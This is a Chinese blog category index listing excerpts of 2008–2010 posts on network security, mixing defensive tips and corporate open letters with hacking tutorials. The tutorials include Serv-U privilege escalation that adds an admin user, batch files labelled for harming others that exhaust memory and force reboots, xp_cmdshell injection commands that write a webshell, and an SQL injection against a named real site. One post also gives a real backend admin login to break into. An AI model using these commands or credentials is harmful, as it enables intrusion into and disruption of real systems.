网络安全 - 随笔分类 - 间歇博客

360致用户的一封公开信

摘要：11月3日，我们与亿万互联网用户一起度过了中国互联网上最惊心动魄的一个不眠夜。360和腾讯之间由产品的争执上升到公司之间的对抗，继而又演变成了互联网用户必须做非此即彼选择的站队大战，这样的局面是任何人都不愿看到的。　　11月4日一早，腾讯又召开了一场新闻发布会，这场发布会始终将矛头指向了360公司的产品。对此，我们感到非常遗憾，360公司的安全产品，包括360扣扣保镖的源代码，已经托管到中国信息... 阅读全文

posted @ 2010-11-05 11:57 间歇博客阅读(420) 评论(0) 推荐(0)

致广大QQ用户的一封信

摘要：亲爱的QQ用户：当您看到这封信的时候，我们刚刚作出了一个非常艰难的决定。在360公司停止对QQ进行外挂侵犯和恶意诋毁之前，我们决定将在装有360软件的电脑上停止运行QQ软件。我们深知这样会给您造成一定的不便，我们诚恳地向您致歉。同时也把作出这一决定的原因写在下面，盼望得到您的理解和支持。一、保障您的QQ帐户安全近期360强制推广并胁迫用户安装非法外挂“扣扣保镖”。该软件劫持... 阅读全文

posted @ 2010-11-05 11:56 间歇博客阅读(415) 评论(0) 推荐(0)

难以承受之痛的背后——致QQ用户的第二封信

摘要：亲爱的QQ用户：这是一个无眠之夜。是我们腾讯人度过的最痛苦和最难过的十几个小时。我们知道，在做出那个艰难的决定之后，将要直面一些用户的吃惊与不解，指责，痛骂甚至背离。我们也知道，即使你们已经做出选择，仍然会心存疑问：腾讯的反应，何至用如此激烈的方式？在此，请听我们诚恳地再道一声歉，为所有可能给你造成的困扰和顾虑，这样的困局，我们同样难以承受。我们清楚地记得让用户有安全稳定服务的庄重承诺，也记得12... 阅读全文

posted @ 2010-11-05 11:56 间歇博客阅读(339) 评论(0) 推荐(0)

论社会工程学

摘要：尊重别人，尊重自己，请不要因为区区的一篇小文而践踏自己的人格，谢谢您们的支持、理解和合作！在我的印象里，社工就是忽悠人，有时候在你渗透的时候知道了管理密码。但是你不知道后台吖。没办法吧。你在怎么渗透也要找地方去上传webshell吧。我就碰到一次，管理忽悠我，忽悠了我3天。说到找后台，我给大家说说找后台的经验。就是上次渗透的时候管理密码都知道了。他网站有一个默认的后台admin.但是我知道的密码登... 阅读全文

posted @ 2009-07-24 11:51 间歇博客阅读(347) 评论(1) 推荐(0)

最阴险的七大黑客技术-间歇博客

摘要：如今，逢此“信息就在指尖”的互联网时代，不少人都拥有自己的电子邮件、QQ号码、MSN等与亲朋好友联系的通信工具，更有许多人在社交网站上注册了自己的账号，这无疑会极大地方便我们的工作与生活。但随着利欲熏心的不法之徒盯上社交网络，普通的用户在上网时便面临着巨大的“被黑”风险。　　社交网络重点在于构建有着共同兴趣和活动的人们的在线社团，它也可以是对探索别人... 阅读全文

posted @ 2008-11-26 12:09 间歇博客阅读(295) 评论(0) 推荐(0)

教你serv-u 提权-间歇博客

摘要：serv-u ftp本地溢出权限提升(使用6.0以及以前版本) 0.用Serv-U提权综合工具生成提权工具serv_u.exe1.先上传 serv_u.exe 到一个盘符下比如是d盘2.执行命令 d:serv_u.exe3.d:serv_u.exe “net user username password /add” (注意命令要有引号)4.d:serv_u.exe“net localgroup... 阅读全文

posted @ 2008-09-01 17:47 间歇博客阅读(773) 评论(0) 推荐(0)

无聊的Css跨站挂马

摘要：以前看过分析家写过一篇文章，介绍跨站脚本的安全隐患，当时只是知道有这样的问题，也没有仔细阅读，目前此类问题经常在一些安全站点发布，偶刚好看到这样一篇文章，抱着知道总比不知道好的想法，翻译整理了一下，原文在偶主页的collection目录里，错误之处请多多指点。 OK，go............ 什么是跨站脚本(CSS/XSS)? 我们所说跨站脚本是指在远程WEB页面的h... 阅读全文

posted @ 2008-07-21 10:31 间歇博客阅读(336) 评论(0) 推荐(0)

零距离感受入侵服务器.

摘要：很多网上安全教程都介绍了如何通过百度和GOOGLE来搜索漏洞代码而发动攻击，这种文章在实际应用中没有什么价值，毕竟很多时候我们需要定点定位攻击目标服务器而不是这种广撒网覆盖形式的入侵。只有学会针对某定点服务器进行扫描和攻击才有利于我们增长企业安全防范与攻击技术，今天笔者就从实际出发带领各位IT168读者学习针对某固定服务器的扫描入侵一条龙操作，让读者对攻击与防御有一个零距离的接触。一，扫... 阅读全文

posted @ 2008-05-16 17:43 间歇博客阅读(434) 评论(0) 推荐(0)

Google 黑客搜索技巧

摘要：站内搜索地址为： httpwww.google.comcustomdomains=（这里写我们要搜索的站点，比如feelids.com）进去可以选择www和feelids.com，当然再选我们要的站内搜索哦！黑客专用信息和资料搜索地址为： httpwww.google.comcustomhl=xx-hacker 这里是google关键字的用法，要设置它为中文，则是 httpww... 阅读全文

posted @ 2008-05-15 15:59 间歇博客阅读(2166) 评论(1) 推荐(0)

各种入侵批处理

摘要：第一个:让别人内存OVER(逼他重启) @echo off start cmd %0 就这3行了第二个:让对方重启指定次数(害人专用) @echo off if not exist c:\1.txt echo. >c:\1.txt & goto err1 if not exist c:\2.txt echo. >c:\2.txt & goto err1 if not ex... 阅读全文

posted @ 2008-05-15 15:47 间歇博客阅读(558) 评论(0) 推荐(1)

ASPX搜索型注入 (摘自樱木花盗's BLOG )

摘要：今天看到有个关于搜索型注入的文章，用到的是一种新技术，探测的是三星：http://notebook.samsung.com.cn/index.aspx 注入方式是：一般网站的搜索都是部分匹配的有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&ST=title&SC= 构造注入语句三星%’and 1=1 and... 阅读全文

posted @ 2008-05-08 18:13 间歇博客阅读(622) 评论(0) 推荐(0)

ASP注入详细命令40条

摘要：1、用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^ >c:\mu.asp';-- ? echo ^ >c:\mu.asp 2、显示SQL系统版本： ? http://192.168.1.5/display.asp?keyno=18... 阅读全文

posted @ 2008-04-30 09:48 间歇博客阅读(561) 评论(0) 推荐(0)

入侵检测技术的基础

摘要：1. IDS(入侵检测系统)存在与发展的必然性 (1)网络安全本身的复杂性，被动式的防御方式显得力不从心。 (2)有关防火墙：网络边界的设备;自身可以被攻破;对某些攻击保护很弱;并非所有威胁均来自防火墙外部。 (3)入侵很容易：入侵教程随处可见;各种工具唾手可得 2. 入侵检测(Intrusion Detection) ●定义：通过从计算机网络或计算机系统中... 阅读全文

posted @ 2008-04-16 17:19 间歇博客阅读(629) 评论(0) 推荐(0)

Svchost.exe病毒

摘要：Svchost.exe是病毒的两种情况 1.利用假冒Svchost.exe名称的病毒程序这种方式运行的病毒并没有直接利用真正的Svchost.exe进程，而是启动了另外一个名称同样是Svchost.exe的病毒进程，由于这个假冒的病毒进程并没有加载系统服务，它和真正的Svchost.exe进程是不同的，只需在命令行窗口中运行一下“Tasklist /svc”，如果看到哪个Svchost.ex... 阅读全文

posted @ 2008-04-05 11:36 间歇博客阅读(3111) 评论(0) 推荐(0)

暴力破解HTTP验证Web页面口令的强度

摘要：首先，你总得有像样的字典吧。去国外网站上下Wordlist吧，或者自己写个简单的程序来生成字典。如果不会写程序，呵呵呵呵，那就下载字典生成程序吧。(不过网上下的wordlist，或者用网上下的字典生成程序生成的字典，好像都不好用) 其次，你总得有工具来运用字典干活吧。可以从网上下载工具，比如大名鼎鼎的brutus。运行时的界面如下： 500)this.width=500" bo... 阅读全文

posted @ 2008-04-01 11:36 间歇博客阅读(861) 评论(0) 推荐(0)

好久没写过了，最近心情很烦闷，发一篇缓解一下心情....

摘要：好久没写过了最近心情很烦闷发一篇缓解一下心情.... 最近关于纵横时空文学站的安全检测很有意思值得我们来学习研究想了半天还是来说一说网络安全吧 Or 1=1的脚本注入技术我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点，我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面，我们再来测试or 1=2。返回... 阅读全文

posted @ 2008-03-12 10:09 间歇博客阅读(306) 评论(0) 推荐(0)

对付电脑病毒的秘笈

摘要：一、未雨绸缪——做好预防措施 1.一个好，两个妙无论是菜鸟还是飞鸟，杀毒软件和网络防火墙都是必需的。上网前或启动机器后马上运行这些软件，就好像给你的机器“穿”上了一层厚厚的“保护衣”，就算不能完全杜绝网络病毒的袭击，起码也能把大部分的网络病毒“拒之门外”。目前杀毒软件非常多，功能也十分接近，大家可以根据需要去购买正版的（都不算贵），也可以在网上下载免费的共享杀毒软件（网上有不少哦）... 阅读全文

posted @ 2008-02-20 17:54 间歇博客阅读(377) 评论(0) 推荐(0)

用TCP/IP过滤保护您的计算机

摘要：除了使用防火墙和杀毒软件，我们还可以使用TCP/IP过滤来保护我们的计算机。TCP/IP过滤可以允许特定的TCP和UDP端口或者IP协议连接到用户的计算机。要配置一个网络连接的TCP/IP过滤，我们可以遵循下面的步骤： 1.在系统托盘中的网络连接图标上右击，选择“状态”，如图1： 500)this.width=500" border=0> 图　1 2.单击“属性”按钮，打开网... 阅读全文

posted @ 2008-02-20 17:50 间歇博客阅读(410) 评论(0) 推荐(0)

教你如何防范Qzone攻击

摘要：由于QQ在桌面IM领域占据着绝对霸主地位，在其身上衍生的各种产品也变得日益流行，而Qzone也逐渐成为网友书写日志和展示个性的地方。因此，Qzone的安全性也备受关注。不过，Qzone近日却爆出了一个跨站漏洞，这个漏洞非常容易被黑客利用。那么，黑客一般会如何通过这个漏洞来攻击普通用户呢？作为用户，我们又如何来防范这一漏洞的危害呢？一、模拟黑客攻击这里，我们首先来了解这个漏洞... 阅读全文

posted @ 2008-01-25 15:53 间歇博客阅读(370) 评论(0) 推荐(0)

进后台简单拿webshell

摘要：我随便找了个后台,还是以前写帖子找的,这里我给你们用户名和密码吧! admin appliedtek101. 工具: WSockExpert.exe抓包工具,明小子打开抓包工具的界面,你会看到什么也没有,然后注意点左上面那小文件夹图标 ,然后出现选择那个iexplore.exe,找到企业后台管理,然后点open,设置如图... 阅读全文

posted @ 2008-01-07 15:12 间歇博客阅读(496) 评论(0) 推荐(0)

随笔分类 - 网络安全